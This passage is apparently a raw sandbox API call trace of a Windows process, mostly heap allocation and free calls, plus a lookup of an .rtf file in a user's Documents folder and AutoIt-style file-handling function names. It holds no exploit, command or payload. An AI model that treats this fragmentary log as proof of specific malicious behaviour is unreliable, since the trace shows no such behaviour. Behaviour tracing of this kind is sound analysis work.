HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0080.456] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.457] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.457] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff39c120, ftCreationTime.dwHighDateTime=0x1d5e8d9, ftLastAccessTime.dwLowDateTime=0x8d8523a0, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0x8d8523a0, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="5R 2.rtf", cAlternateFileName="5R2~1.RTF")) returned 0x41ac440 [0080.457] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0080.457] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0080.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0080.458] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0080.458] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0080.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0080.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0080.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0080.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0080.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0080.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0080.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0080.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0080.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0080.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.461] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a50b8 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.464] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: 